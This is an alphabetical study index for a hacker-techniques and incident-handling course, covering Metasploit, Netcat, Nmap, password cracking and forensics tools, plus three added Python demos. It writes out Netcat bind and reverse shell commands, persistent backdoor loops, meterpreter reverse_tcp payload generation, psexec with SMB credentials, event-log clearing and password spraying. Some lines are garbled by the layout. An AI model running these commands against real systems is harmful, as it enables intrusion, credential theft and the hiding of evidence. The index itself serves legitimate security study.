Metasploit additional features 3 118 Multi-session; in-memory process migration; disable keyboard & mouse; keylogger; sniffing; encoding for IDS evasion; pivoting; privilege escalation
Metasploit Features - Routines 3 119 Payloads, encoders/decoders, NOP sleds, wrapper/shellcode creation, msfelfscan & msfpescan
Metasploit launch and msfconsole 3 153 cd /home…framework4.9.0; source /opt/useruby193.sh; ./msfconsole; show exploits. Or: # ifconfig eth0 10.10.75.1/16; # msfconsole -q; show exploits
Metasploit multi/handler waits for connection:use exploit/multi/handler,set PAYLOAD..,set LHOST,exploit
Metasploit Payloads 3 115 Payloads can be exported in different formats; eg of payloads: bind shell, reverse shell, VNC, inject DLL, create local admin user
Metasploit Payloads - Meterpreter 3 116 1. Doesn't create a new process to run the shell, runs inside the exploited process; 2. doesn't touch the HDD, gives access by manipulating memory; 3. has its own commands, no need for executables on the target; 4. dynamically loads new modules, changing its function while in the memory of the exploited process; ability to load and interact with DLLs in real time after exploitation
metasploit psexec 3 155, 156 use exploit/windows/smb/psexec; set PAYLOAD windows/meterpreter/reverse_tcp
metasploit search search type:exploit psexec, info exploit/windows/smb/psexec
Metasploit User Interface 3 113 Select exploit, select target, select payload or set command to execute, set options & launch
Meterpreter 5 116 clearev clears the Application, Security and System event logs; no selective edit tool yet
Meterpreter - get a shell 3 163 Run the "shell" command to get a cmd prompt; test using net user; exit
Meterpreter Features 3 103, 117 Uses TLS to encrypt communication; displays system info; interacts with the file system, network and processes on the target
Meterpreter Session management 3 159 background; sessions -l; sessions -i [session_nr]
Microsoft Sysinternals 1 77, 126 Process Monitor, PsExec
migrate 3 164, 167-169 migrate [Pid], getpid ; migrate [PIDofCalc.exe](meterpreter)
Mimikatz 4 51 extracts/views clear-text passwords from LSASS
more Command to view the contents of an alternate data stream (location and name of the stream needed), eg more < notepad.exe:stream1.exe
mount cdrom cd /mnt/cdrom; mount cdrom; mount /dev/cdrom; mount /mnt/cdrom
MP3Stego 5 148 Hides data in MP3 files
MS-Kerberos5 Pre-Auth 4 25 Used for authentication across the network
msfelfscan & msfpescan 3 103, 119 Scan EXEs and DLLs for usable instruction sequences (POP POP RET)
msfelfscan & msfpescan 5 56 Can find libraries in unusual locations (service pack/language)
msfvenom 3 137, 138

msfvenom 4 77 Converts a payload into a standalone file
msfvenom 5 18
msfvenom 3 137, 147 -f exe-only
msyslog 5 118 cryptographic integrity check of log files & remote sys logging
MySQL 4 129-130, 137 SQLi lab
namechk.com - recon site 2 30 Checks names on over 100 social network sites
nbtstat -s 1 65 Systems connected to the machine listed by IP; NetBIOS over TCP/IP
nc 6 55 Netcat example commands
nc -l -p 55555 -e /bin/bash 2 Open a backdoor listener on port 55555
nc [ListenerIP] [port] -e /bin/sh 3 21 Push a shell session from a client to the server
ncpa.cpl 1 Network interface adapter view (Windows)
ncat 3 11 Netcat variation from the Nmap project (SSL, nice and easy features, 100 simultaneous connections)
Nessus (Linux) 2 119-123, 126-127, 132, 135 Vulnerability scanning (commercial basis); can attempt to pull the /etc/passwd file via TFTP
Nessus Architecture Client-server; the server has the plugins; HTML-based GUI on the client; HTTPS on TCP 8834 to the server
Nessus Platform Support Regular OSes, regular browsers; "dangerous" plugins run attacks that can cause problems on the target
Nessus Plug-ins A plugin for each check, about 100k; auto-update every 24 hrs; write your own plugins
Nessus Startup & stop 2 sudo systemctl start nessusd; firefox https://localhost:8834 &; systemctl stop nessusd
Nessus Attack Scripting Language (NASL) 2 123 Plug-ins can be written in NASL
net (Win commands) 6 53 Windows NET commands
net localgroup [group_name] 1 71, 88 list members of a group (administrators)
net session 1 65 See SMB sessions that ARE OPEN to this system (inbound)
net session 2 146, 156-157, 162 net session \\[IPaddress] /del: drop an inbound SMB session
net use (establish a session) 2 137-140, 146, 162 net use \\[TargetIP]: establish an SMB session (Windows). net use \\[TargetIP] "" /u:"": connect as no user (anonymous or NULL SMB session; blank username/password). net use \\[TargetIP]\[ShareName] [pass] /u:[User]: SMB session as another user or to a specific share. net use \\[IPaddress] /del: drop an outbound SMB session. net use * /del: delete all outbound SMB sessions
net use 4 50 See which SMB sessions YOU HAVE to OTHER systems (outbound)
net view 1 65 net view \\127.0.0.1 -> file shares on the local host
net view 2 139-140, 152 net view \\[TargetIPaddress]: once an SMB session is established you can get the list of shares
NetBIOS Name Service (NBT-NS) 3 50 If DNS and LLMNR fail, NBT-NS is used (UDP 137; the NetBIOS session service is TCP 139)

Netcat 3 11-26, 28-43 Reads and writes data across the network. Variations: Ncat, dnscat, socat, cryptcat, linkcat, more
Netcat 4 181, 187-188 Used in loops: while (Linux); for (Windows)
Netcat as a scanner 3 17 Standard scan with -z (zero I/O, minimal data); not stealthy like nmap; scripts for vuln scanning
Netcat Backdoors 3 19 nc -l -p [port] -e /bin/sh; nc -l -p [port] -e cmd.exe
Netcat Client mode 3 12 stdin -> client initiates the connection -> stdout. Netcat's own messages go to stderr, not stdout
Netcat Listening mode 3 13 stdin -> waits for a connection -> stdout; the difference from client mode is that it runs with -l (listen mode) and waits for a connection
Netcat Client-Client Relay The relay: nc 127.0.0.1 4444 0<backpipe | nc 127.0.0.1 2222 1>backpipe

# //Secureworks/Confidential - Limited External Distribution Page 20


Tools and Commands Book/Page Definitions

"-l=listen,L=listen harder,-u:UDP,-p=src port,-e=exe,-z:zero I/O,-


Netcat command switches 3 14 wN:wait N secs"; >:dump output to file; <:dump input from file; |:Pipe
output of 1st program into 2nd program
Lis-Cli:on Lis: nc -l -p < [file].on Cli: nc [LisIP] [port] > [file] ; Cli-
Netcat Data Transfer 3 16 Lis:on Lis: nc -l -p > [file].on Cli: nc [LisIP] [port] < [file]
know your sys,close all unused ports,apply sys patches,stop unus
Netcat Defense 3 26 proc,architecht
while [ 1 ]; do echo "started"; nc -l -p [port] -e /bin/bash; done
Netcat Persistent Backdoors 3 20 windows:-L=persisten listening,linux:cronjob,while loop sh script run
with nohup
Netcat Relays (Book 3, p. 22): nc -l -p [in_port] | nc [target_serv] [out_port]; redirects traffic through ports allowed by the firewall. Note that a plain pipe only carries data one way; the FIFO method below carries both directions.
Netcat Relays FIFO Method (Book 3, p. 23): mknod backpipe p; nc -l -p 11111 0<backpipe | nc next_hop 54321 1>backpipe
Netcat Relays for Backdoor w/o -e (Book 3, p. 25): mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
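Added example (not part of the course index above): a small Python TCP relay that does what the netcat FIFO relay does, so the two data directions the backpipe supplies are explicit. The echo service, loopback ports and payload are constructed for the demo; the relay itself is generic.

```python
"""Bidirectional TCP relay, the Python equivalent of the netcat FIFO relay
    mknod backpipe p; nc -l -p IN 0<backpipe | nc NEXT_HOP OUT 1>backpipe
Added example; the echo service, ports and payload below are constructed."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src closes, then half-close dst (one 'pipe')."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_one_connection(listener: socket.socket, next_hop: tuple) -> None:
    """Accept one inbound client, connect onward to next_hop and pump both
    directions. This is the pipe plus the backpipe of the nc relay."""
    inbound, _ = listener.accept()
    outbound = socket.create_connection(next_hop)
    threads = [threading.Thread(target=_pump, args=(inbound, outbound)),
               threading.Thread(target=_pump, args=(outbound, inbound))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    inbound.close()
    outbound.close()


def _listen(port: int = 0) -> socket.socket:
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", port))   # port 0: let the OS pick a free one
    s.listen(1)
    return s


def _echo_once(listener: socket.socket) -> None:
    """Constructed stand-in for the real next hop: echoes upper-cased until the peer closes."""
    conn, _ = listener.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data.upper())


def roundtrip(payload: bytes) -> bytes:
    """Wire client -> relay -> echo on loopback and return what the client gets back."""
    echo_l, relay_l = _listen(), _listen()
    echo_t = threading.Thread(target=_echo_once, args=(echo_l,))
    relay_t = threading.Thread(target=relay_one_connection,
                               args=(relay_l, echo_l.getsockname()))
    echo_t.start()
    relay_t.start()
    client = socket.create_connection(relay_l.getsockname())
    client.sendall(payload)
    client.shutdown(socket.SHUT_WR)        # we are done sending; wait for the reply
    received = b""
    while True:
        chunk = client.recv(4096)
        if not chunk:
            break
        received += chunk
    client.close()
    echo_t.join()
    relay_t.join()
    echo_l.close()
    relay_l.close()
    return received


if __name__ == "__main__":
    print(roundtrip(b"hello through the relay\n"))
```

The half-close in _pump is what keeps the relay from hanging: when one side finishes sending, the relay passes the FIN on, which is exactly what the netcat pipe cannot do without the FIFO.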
Netcat Reverse Shell Backdoor (Book 3, p. 21): on the listener (attacker): nc -l -p [port]. On the client (victim): nc [ListenerIP] [port] -e /bin/sh. Type your commands on the listener.
Netcat uses (Book 3, p. 15): data transfer, port scanning, making connections to open ports, backdoors, relays.
Netcat vs Telnet for connections (Book 3, p. 18): Netcat is faster, supports UDP and drops connections cleanly; Telnet mixes its error/comment messages into stdout.
NetNanny- style filters 1 172 name for the filter style of web proxy (websense, Blue Coat, etc)
netsh (Book 1, pp. 66, 92, 203; Book 2, pp. 73-74, 151; Book 3, pp. 28, 30)
netsh wlan (Book 2, pp. 73-74)

netstat (Book 1, pp. 55-56, 66, 81, 208, 212, 222, 229, 234-235, 239, 241, 252; Book 2, pp. 101, 103; Book 3, pp. 164-165, 169, 173; Book 4, pp. 179-180, 182, 185-188; Book 5, pp. 23, 25, 33, 44, 47-48, 63, 76, 96, 101): network usage.
Linux: netstat -nap, netstat -nap | less; netstat -nat (t for TCP) | grep -i listen to list listeners; grep for SYN_RECV to count half-open connections.
Windows: -na shows listeners; -nao also shows the owning PID; -nab shows the executable and DLLs involved; -o shows the owning process ID; netstat -na | find /I "listening" finds listening ports.
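Added example (not part of the original index): a parser for Linux netstat -nat output that produces the three things the rows above grep for by hand: listeners, per-state counts and half-open (SYN_RECV) connections per local port. The SAMPLE_NETSTAT text is constructed for the demo, not captured from a real host.

```python
"""Parse `netstat -nat`-style output: listeners, state counts, half-open connections.
Added example; SAMPLE_NETSTAT is constructed, not captured from a real host."""
from collections import Counter

SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 10.10.75.1:80           203.0.113.7:40001       SYN_RECV
tcp        0      0 10.10.75.1:80           203.0.113.8:40002       SYN_RECV
tcp        0      0 10.10.75.1:80           203.0.113.9:40003       SYN_RECV
tcp        0      0 10.10.75.1:22           192.168.1.20:51234      ESTABLISHED
tcp6       0      0 :::445                  :::*                    LISTEN
udp        0      0 0.0.0.0:53              0.0.0.0:*
"""


def _split_addr(addr):
    """'10.10.75.1:80' -> ('10.10.75.1', 80); ':::445' -> ('::', 445); '*' port -> None."""
    host, _, port = addr.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or not parts[0].startswith(("tcp", "udp")):
            continue                       # skip the header lines
        proto, local, foreign = parts[0], parts[3], parts[4]
        state = parts[5] if len(parts) > 5 else ""   # UDP rows carry no state
        _, lport = _split_addr(local)
        fhost, fport = _split_addr(foreign)
        rows.append({"proto": proto, "local_port": lport,
                     "foreign_host": fhost, "foreign_port": fport, "state": state})
    return rows


def listeners(rows):
    """TCP LISTEN sockets plus UDP sockets bound with a wildcard peer."""
    return sorted((r["proto"], r["local_port"]) for r in rows
                  if r["state"] == "LISTEN"
                  or (r["proto"].startswith("udp") and r["foreign_port"] is None))


def state_counts(rows):
    return Counter(r["state"] for r in rows if r["state"])


def half_open_by_port(rows, threshold=1):
    """Local ports with at least `threshold` SYN_RECV (half-open) connections;
    a large count on one port is the netstat signature of a SYN flood."""
    c = Counter(r["local_port"] for r in rows if r["state"] == "SYN_RECV")
    return {port: n for port, n in c.items() if n >= threshold}


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print(listeners(rows))
    print(state_counts(rows))
    print(half_open_by_port(rows, threshold=3))
```

Feed it real output with parse_netstat(open("netstat.txt").read()); the Windows column layout differs (no Recv-Q/Send-Q), so this parser is for the Linux form shown in the rows above.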
NetStumbler (Book 2, p. 61; Book 4, p. 24): war-driving tool for Windows (802.11 a/b/g); discovers SSIDs by sending probe requests, so it does not find cloaked SSIDs (use Wellenreiter instead).
Network Address Translation (NAT) (Book 1, pp. 36, 202)
Network Forensics (Book 5, p. 68): look for unusual network patterns, correlate data and logs, NIPS.
Network Forensics Tools: NetWitness, FireEye, Sourcefire, TippingPoint, ForeScout etc.
Network mapping defense (Book 2, pp. 85-86): Preparation: disable incoming ICMP messages, disable outgoing Time Exceeded messages. Identification: IDS. Containment: temporarily block the source address on the firewall.


network usage (Linux) (Book 1, p. 228): netstat -nap, netstat -nap | less


Niksun (Book 3): can reconstitute an entire browsing session
Nikto (Book 4, pp. 119, 134): web/CGI scanner; checks for more than 3,000 dangerous CGI/ASP scripts and related material. Wikto is the Windows port.
Nikto authentication and communication features: supports web authentication, can guess passwords, stores cookies, supports proxies and SSL.
Nikto Cookie View: navigate to the Nikto folder, then perl ./nikto.pl -Single and supply the hostname, URL and data, e.g. Cookie: user=2
Nikto features: auto-updates itself, distinguishes OK from NOT FOUND responses, finds CGI directories, reads robots.txt, IDS evasion.
Nikto IDS Evasion: morphs requests so they do not match signatures; 9 techniques work at the application layer, 1 at layer 4. Techniques: URL encoding, /./ directory insertion, premature URL ending, long URL, fake parameter, TAB separation, case sensitivity, Windows delimiter, NULL method, session splicing (the L4 method).
Nikto password attack (Book 2, p. 167): can launch a password-guessing attack against the target; uses a dictionary file.
Nimda (Book 1, p. 96; Book 4, pp. 57-58): multi-exploit and multi-platform worm
Nmap (Book 1, pp. 54, 56, 121; Book 2, pp. 80, 82-84, 93-96, 106-109, 112; Book 3, pp. 11, 17; Book 4, p. 104; Book 5, pp. 80, 162, 164-168; Book 6, pp. 16, 31-32, 48): nmap -A gives all details (banners, OS identification, traceroute, etc.). Nmap lab: Book 2, p. 106.
Nmap -A (Book 2, p. 108): all details, pulls banners, OS identification, traceroute, etc.
nmap -n -sP -oN Smurf.log '209.12.*.63,127,191,255': look for potential Smurf amplifiers (-sP is the old name for -sn, host discovery only; -oN writes normal output to the file)

nmap source ports for scanning (-g/--source-port): UDP 53, TCP 53 (DNS zone transfer), TCP 80 (most popular), TCP 443

Nmap ACK scanning (Book 2, p. 94): useful for mapping firewall rules, not for port scanning; won't get past a stateful firewall; cannot tell whether a port is open.
Nmap identifying addresses (host discovery sweep) (Book 2, p. 82): sends 4 packets to each address: ICMP echo, TCP SYN to 443, TCP ACK to 80, ICMP timestamp.
Nmap OS fingerprinting (Book 2, p. 95): sends various packet types (e.g. SYN, FIN, URG, PUSH) and measures the responses.
Nmap OS fingerprinting, 2nd generation (Book 2, p. 96): new methods: sequence number GCD, window size, TCP timestamp, TTL guess, DF bit, congestion control. If the fingerprint is not recognized, nmap gives instructions to submit it to insecure.org.
nmap --reason (Book 2, p. 107): gives the reason nmap believes a port is open, e.g. nmap --reason 127.0.0.1
Nmap scan types (Book 2, p. 93): ping sweep, ARP scan, connect scan, SYN, ACK, FIN, FTP proxy "bounce attack", idle, UDP, RPC
Nmap traceroute capability: works backwards: sends a packet of the right protocol to the target, determines the hop distance, then decrements the TTL hop by hop.

nohup (no hang up) (Book 3, p. 20; Book 5, pp. 95, 100, 102): on Linux/Unix makes a process keep running even if the user who invoked it logs out, so a listener keeps listening: a reliable backdoor.
Non-persistent cookie (Book 4, p. 144): lives in memory; write JavaScript that lets you view and edit the cookie, or use a proxy to modify it in the middle.
NOP (Book 3, pp. 109, 119, 144): no operation; does nothing but keeps the program running (used to build NOP sleds in front of shellcode)


Normal stack (Book 3, p. 99): when a subroutine is called, the function's variables and the return address pointer are stored on the stack.
Not notifying Law Enforcement (Preparation) (Book 1, p. 24): why not? Control issues and publicity, seizure of materials, business interruption.
Notifying Law Enforcement (Book 1, p. 23): if the incident involves PII, PHI, impact to third parties, or public health and safety you must notify.
nslookup (Book 1, p. 106; Book 2, pp. 24-26; Book 4, pp. 99-100; Book 6, pp. 29, 47): Windows; deprecated in some Unix variants, use dig or host instead; used to get zone transfer information.
NT hash (Book 4, pp. 16, 19-22, 25, 28, 39, 49-51; Book 5, p. 173): MD4 over the UTF-16LE password; 16-byte hash stored in the SAM. If the password is longer than 14 characters no LM hash is created. No salt.
NTFS 5 104 Alternate data streams are supported in NTFS files
NTLDR (Book 5, p. 57): verifies the integrity of Ntoskrnl.exe before the kernel is loaded into memory.

NTLMv1 (Book 4, pp. 25, 30, 32, 39, 49, 51; Book 6, p. 33)
NTLMv2 (Book 3, pp. 88, 91-92; Book 4, pp. 25, 30-32, 49, 51)
Ntoskrnl.exe (Book 5, p. 57)
OllyDbg debugger: used to unpack Windows executables
Omnipeek (Airopeek) 2 64 Wireless specific sniffer
OSSEC (Book 5, pp. 65, 67): general-purpose host monitoring and analysis tool; its "Rootcheck" feature provides rootkit detection.
Open Web Application Security Project (OWASP) (Book 4, pp. 89, 104, 110, 150)
OpenIOC by Mandiant: XML IOCs that define paths, names, hashes, executables, usernames, etc. indicating an attack
OpenPuff 5 149
OpenStego 5 149
OpenVAS (Book 1, p. 121; Book 2, p. 119): free vulnerability scanner
Orion Live CD 1 104
Orkut 2 30
OS fingerprinting (Book 2, pp. 84, 95-96; Book 6, pp. 16, 31): passive fingerprinting uses a sniffer that analyses the packets gathered.
OSPF-MD5 4 26
Out-Of-Band (OOB) (Book 1, pp. 52, 105; Book 2, pp. 53, 56-58)
Outlook 4 24, 57, 63
osvdb.org, open source vulnerability database (Book 1): check for vulnerabilities in software
OWASP - Open Web Application Security Project (Book 4, p. 89): guide to building secure web apps/services, pen-test framework and checklist, WebGoat
p0f - passive OS fingerprinting tool: determines the system type from TCP, UDP and ICMP headers, the TTL value and the User-Agent string
packet fragmentation 5 128, 162
Packet Storm 5 195
Packing: pack an exe so that it decompresses itself at run time and then runs the main executable.
Packing Defense (Book 5, p. 20): use the right plugins for the OllyDbg debugger on Windows.
Packing tools (Book 5): UPX, Yoda, Themida, Exe32pack, PECompact, PEBundle, Thinstall


PAM to enforce a password complexity policy in Linux (Book 4, p. 41): Pluggable Authentication Modules; can also make users authenticate to RADIUS, Kerberos, etc.
Paros Web App Manipulation Proxy tool
Parser problems - buffer overflow (Book 3, p. 131): code that grabs data from the network and parses it for the application; parsing code is a classic buffer overflow location, e.g. Wireshark, Snort.
Parser problems (file & protocol) defense (Book 3, p. 134): be careful with sniffers (usually installed in the DMZ, data centers, etc.); patch!
Pass the hash attack (Book 4, p. 49): steal the hash and take advantage of LM challenge/response or NTLMv1/v2 across the network; the hash itself gets passed, no cracking needed.
Pass the hash attack architecture (Book 4, p. 50): steal the hash, place it in memory, use it for SMB.
Pass the hash attack defense (Book 4, p. 52): Prep: patch, harden, endpoint security, HIPS, SMB only via admin accounts. Identification: configuration changes.
Pass the hash attack tools (Book 4, p. 51): pshtoolkit and Windows Credential Editor (WCE) inject the hash into LSASS; Metasploit psexec.
Passive OS fingerprinting: doesn't send packets, just sniffs; e.g. surf to the website and look at the headers.
Passive OS fingerprinting defenses: Prep: close unused ports, stateful firewall. Identification: not much, because it is passive, but you can use IDS signatures.
password cracking (Book 2, p. 73; Book 4, pp. 5-14, 22-24, 26-27, 31, 33, 40, 47, 49, 139; Book 5, pp. 170, 189; Book 6, p. 16): get the encrypted/hashed password, determine the algorithm used, hash many dictionary passwords and compare. Audit; improve technical controls for password complexity. Prep: disable LANMAN challenge/response; no LM hashes; policy (two-factor auth); protect the SAM and SYSKEY.
Password cracking methods (Book 4, p. 10): dictionary (word list), brute force (iterating through character sets), hybrid (a mix of the two). Tools: Cain & Abel, John, Hashcat.
password guessing (Book 2, p. 56; Book 3, pp. 157, 173; Book 4, pp. 4-8, 55; Book 6, pp. 16, 35): pretty slow; can trigger account lockout. Try a small number of passwords against many accounts to avoid lockout. Passwords are stored in Windows in the SAM database and AD; in Linux in /etc/shadow.
Password hashes (Book 4, p. 29): obtain with fgdump, Cain, Meterpreter hashdump, sniffing, a Linux boot CD, ntbackup.exe
password spraying (Book 2, p. 159; Book 4, p. 7): try a few passwords against many accounts on many systems to avoid account lockout. SMB lab: Invoke-LocalPasswordSpray -Password Winter2017
password storing (Book 4, p. 5): Windows: SAM database and AD. Linux: /etc/shadow
Payload to executable (msfpayload): ./msfpayload windows/meterpreter/reverse_tcp LHOST=[IP] X > /tmp/meterpreter.exe
PEBundle 5 19
PECompact 5 19
PeepNtom 2 98
People preparation/assessment tools (Book 1, p. 20): Sptoolkit and PhishMe: tools to create phishing campaigns for employee assessment
Personally Identifiable Information (PII) (Book 1, p. 23; Book 4, p. 111; Book 5, p. 159)
PhishMe (Book 1, p. 20): tool to create phishing campaigns for employee assessment
phpBB 2 42
Picasa 2 31
Ping of Death 4 154
ping sweep: determine which hosts are up in an IP range


Pivot (Book 3, p. 118): uses a compromised system as a launch point against other targets (e.g. port forwarding)
Pluggable Authentication Modules (PAM) (Book 4, pp. 40-41)
Point of contact and resources (Preparation) (Book 1, p. 35): POC and command/communications center, secure communications, permission for resources ($5-10K)
Poison Ivy (Book 5, pp. 9, 14-15, 18): remote-control backdoor; configure the server, move the exe to the target, control it with the client. Binary, C, Python.
Policy - Peer Notification (Preparation) (Book 1, p. 26): establish a policy for notifying outside peers, partners, your company, employees and VPN users, with a warning banner.
Policy (Preparation) (Book 1, p. 22): approach to incident handling: keep it secret or notify law enforcement; contain & clear or watch & learn.
polymorphic (Book 3, p. 119; Book 4, pp. 56, 62-65; Book 5, pp. 151, 194): changes its code base in a way that keeps it executing; evades AV. E.g. 1. XOR the code and prepend an XOR decoder; 2. rewrite operations with equivalents, e.g. X+Y = X-(-Y).
port 53 (Book 2, pp. 25, 27, 93; Book 3, p. 16; Book 5, p. 162)
Port knocking: backdoor technique; a sniffer watches for packets to the specific ports it is interested in (the knock sequence) before opening access.
Port Reporter - by Microsoft 2 102 free tool that generates logs showing port activity
Port scanners - defenses (Book 2, p. 100): Prep: close unused ports and apply filters, stateful firewall, IDS. Identification: IDS signatures, log analysis.
PortSentry tools (Book 1, p. 53): host perimeter detection
Portspoof: makes every port on the machine appear open with a service behind it, confusing the attacker's scan
portmapper 2 93
positive skew analysis 1 140
PowerPoint (Book 2, p. 40; Book 3, pp. 133, 139, 141)
PowerShell (Book 1, pp. 140-141; Book 2, pp. 82, 142, 159-160; Book 3, pp. 142, 152, 161, 164-165, 168-169)
PowerShell Empire 2 142
Preparation Overview (Book 1, p. 19): people, policy, data, software/hardware, communications, supplies, transportation, space, power, documentation

Pretty Good Privacy (PGP) (Book 1, pp. 25-26, 33, 35, 52, 163; Book 2, pp. 13, 47)
printf: inserts its arguments into a format string, creating formatted output.
printf common misuse (Book 3): right way: printf("%s", buffer); wrong way: printf(buffer); (user-controlled data becomes the format string)
Private VLANs (PVLANs) (Book 2, p. 148; Book 3, p. 26): used to defend against Netcat relays; isolate traffic to/from individual systems
Privilege escalation rootkit (Book 5, p. 43): modified versions of chfn, chsh, passwd and su; run with the rootkit password they give you Linux root
Process commands Windows (Book 3, p. 165): netstat -nao | find "EST"; tasklist /fi "pid eq [pid]" or tasklist /fi "imagename eq [name]"; tasklist /m
Process Explorer & Monitor 1 77 Process-analysis tool
Process priority: wmic process get name, priority
processes - unusual processes (Book 1, p. 247): ps aux, lsof -p [pid]


processes (linux) 1 226 ps aux, ps aux | less, top


Project Rainbow Crack 4 22
Promiscuous mode (Book 1, pp. 62, 202, 256, 266; Book 3, pp. 45, 132; Book 4, p. 24; Book 5, pp. 52, 65)
Promiscuous sniffing (Book 3, p. 45)
Protocol parser buffer overflow (Book 3, pp. 132-133): the attacker can flood the network with the exploit and wait for someone to run a protocol parser (sniffer) on it.
Protocol parser defenses (Book 3, p. 134): patch sniffing tools (Wireshark, Snort, tcpdump, NetMon)
psexec on XP: due to compatibility issues, run set NTLM::UseNTLM2_session false
psexec (Book 1, p. 126; Book 2, p. 137; Book 3, pp. 152, 155-157, 159, 164, 166, 173; Book 4, p. 51; Book 6, p. 51): in Metasploit: use exploit/windows/smb/psexec; set PAYLOAD windows/meterpreter/reverse_tcp; set RHOST [IP]; set LHOST [IP]; set SMBUser [usr]; set SMBPass [pass]; show options
pshtoolkit (Book 4, p. 51): pass-the-hash tool (Windows); input is the LANMAN/NT hash
Ptunnel (Book 5, pp. 124-125, 134): encapsulates TCP inside ICMP echo requests and replies. Components: client and proxy.
Pulsing zombies (Book 4, p. 166): bomb traffic for 10 minutes, back off for 1 hour, start again; ISPs can only trace active traffic, so the attack is asynchronous.
PUSH 2 25, 90 Data should be pushed through the TCP stack
Push exploit code into memory - buffer (Book 3, p. 106): the exploit must be written for the specific OS and architecture; target UID 0 and root SUID programs.
Pushpin - recon (Book 2, pp. 31-32): social media geolocation (Flickr, Twitter, Picasa, etc.)

pwd (Book 1, pp. 208, 212, 214, 216-217, 222, 224, 229, 235, 239; Book 3, pp. 33, 161; Book 4, pp. 29, 31, 35, 47; Book 6, p. 50)
pwdump3 (Book 4, pp. 35, 74; Book 6, p. 50): gets hashes
python simple webserver: python -m SimpleHTTPServer (Python 2; python3 -m http.server on Python 3) loads a module that implements a simple web server serving the current directory
python to .exe convert (Book 5, p. 144): py2exe; pyInjector; PyInstaller
Volatility, invoke using Python: python2.7 vol.py -h; help for one module: python2.7 vol.py [module] -h
Volatility, DLLs and command line: python2.7 vol.py dlllist -p [pid] -f [path to mem_capture] --profile=[OS profile]
Volatility, viewing network connections: python2.7 vol.py timeliner -f [path to mem_capture] --profile=[OS profile] | grep ESTABLISHED
Volatility, viewing processes (a list of the processes running at capture time): python2.7 vol.py timeliner -f [path to mem_capture] --profile=Win7SP0x86 (timeliner as given here; the dedicated plugin is pslist)


Quick UDP Internet Connections (QUIC) (Book 5, p. 132): possible covert channel; multiplexed connections carried over UDP
RADIUS Shared Secrets 4 26
Rainbow Tables (Book 4, pp. 22, 27, 139; Book 5, p. 173): precalculating encrypted/hashed passwords and storing them in a table for comparison (defeated by salting)
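Added example (not part of the original index) covering both the password cracking methods rows above and this Rainbow Tables row: dictionary and hybrid candidates, a precomputed hash-to-plaintext table that cracks unsalted hashes with a lookup, and the per-record work a salt forces. SHA-256 stands in for the LM/NT algorithms the rows discuss; the word list, the "stolen" hashes and the salt are constructed.

```python
"""Dictionary, hybrid and precomputed-table cracking of unsalted hashes, and why a
salt breaks the precomputed table. Added example; SHA-256 stands in for LM/NT and
every record below is constructed."""
import hashlib

WORDLIST = ["password", "letmein", "qwerty", "Summer2017", "Winter2017"]   # constructed
SALT = bytes.fromhex("a3f1c29e77b04d15")                                   # constructed


def unsalted_hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(salt: bytes, password: str) -> str:
    """Same password, different salt -> different hash; the table below never matches it."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def hybrid_candidates(words, suffixes=("", "1", "!", "2017")):
    """Hybrid method: a word list mutated with common suffixes."""
    return [w + s for w in words for s in suffixes]


def build_table(candidates):
    """Precomputed (rainbow-table-style) lookup hash -> plaintext, built once, reused forever."""
    return {unsalted_hash(c): c for c in candidates}


def crack_unsalted(stolen_hashes, table):
    """One dictionary lookup per stolen hash; no hashing at attack time."""
    return [(h, table.get(h)) for h in stolen_hashes]


def crack_salted(salt: bytes, stolen_hash: str, candidates):
    """With a salt every candidate must be re-hashed for this one record."""
    for c in candidates:
        if salted_hash(salt, c) == stolen_hash:
            return c
    return None


def demo():
    cands = hybrid_candidates(WORDLIST)
    table = build_table(cands)
    # Two users chose the same password: their unsalted hashes are identical,
    # so cracking one cracks both (and shows up as duplicate hashes in the dump).
    h_fred = unsalted_hash("Winter2017")
    h_bob = unsalted_hash("Winter2017")
    cracked = crack_unsalted([h_fred, h_bob, unsalted_hash("qwerty!")], table)
    sh_fred = salted_hash(SALT, "Winter2017")
    return {
        "same_hash": h_fred == h_bob,
        "cracked": cracked,
        "table_hit_on_salted": table.get(sh_fred),          # None: table is useless
        "salted_cracked": crack_salted(SALT, sh_fred, cands),  # still weak, but per-record work
        "hashes_per_salted_record": len(cands),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The point the rows make about LM/NT hashes being unsalted is the "same_hash" and "table_hit_on_salted" lines: without a salt one table cracks every dump; with one, the attacker pays len(candidates) hashes per record.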
Ramen 4 57-58
Rapid7 (Book 2, pp. 54, 119; Book 5, p. 117): NeXpose, vulnerability scanner (commercial); WarVOX, war-dialing tool (free); User Behavior Analytics, checks the behavior of an account
Real Intelligence Threat Analytics (RITA) (Book 1, pp. 147-148, 150, 154-155, 158; Book 3, p. 128; Book 5, p. 68)
Recon site (Book 2, p. 30): namechk.com checks a username across more than 100 social networking sites
Recon with search engines (Book 2, p. 35): GHDB (Google Hacking Database), Bing, Baidu etc.
Recon-ng 2 31, 43 Target compromised accounts - recon
Reconnaissance (Book 1, pp. 56, 95; Book 2, pp. 16, 19, 22, 27, 35, 37, 40, 44, 46, 48; Book 6, pp. 22-23, 28, 30, 34, 37, 39, 44): casing the joint

Recovery (Book 1, pp. 10, 14, 17, 30, 32, 42, 103, 109, 114, 118, 123-126, 128; Book 2, pp. 58, 75; Book 3, p. 129; Book 4, pp. 52, 74, 101, 111, 126, 151; Book 5, pp. 69, 145): restore operations (off hours), monitor for backdoors, look for artifacts, watch for the attacker to come back
